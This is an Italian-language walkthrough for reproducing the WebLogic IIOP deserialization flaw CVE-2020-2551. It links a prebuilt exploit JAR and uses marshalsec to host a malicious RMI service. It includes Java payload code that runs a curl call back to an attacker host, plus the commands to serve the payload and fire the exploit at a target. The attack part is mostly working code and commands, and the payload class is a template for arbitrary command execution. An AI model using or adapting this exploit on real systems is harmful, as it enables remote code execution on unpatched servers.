
Weblogic IIOP CVE-2020-2551
Weblogic IIOP deserializzazione
Weblogic10.3.6+jdk1.6
JAR già pacchettizzato Codice di estrazione: a6ob
Scarica il JAR, quindi usa marshalsec per avviare un servizio RMI malevolo, compila localmente un exp.java
package payload;
import java.io.IOException;
public class exp {
public exp() {
String cmd = "curl http://172.16.1.1/success";
try {
Runtime.getRuntime().exec(cmd).getInputStream();
} catch (IOException e) {
e.printStackTrace();
}
}
}
Compila possibilmente con la stessa versione di JDK e le stesse librerie dipendenti (wlfullclient.jar) utilizzate da Weblogic poi avvia un server web locale
python -m http.server --bind 0.0.0.0 80
Esegui il JAR da riga di comando
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp
Il risultato effettivo è mostrato in figura

Molti colleghi dicono che la riproduzione non ha successo. Dopo aver letto alcuni articoli online, si è scoperto che IIOP ha problemi con la modalità NAT. Oggi ho scoperto che su Xianzhi c'è https://xz.aliyun.com/t/7498, spostatevi lì.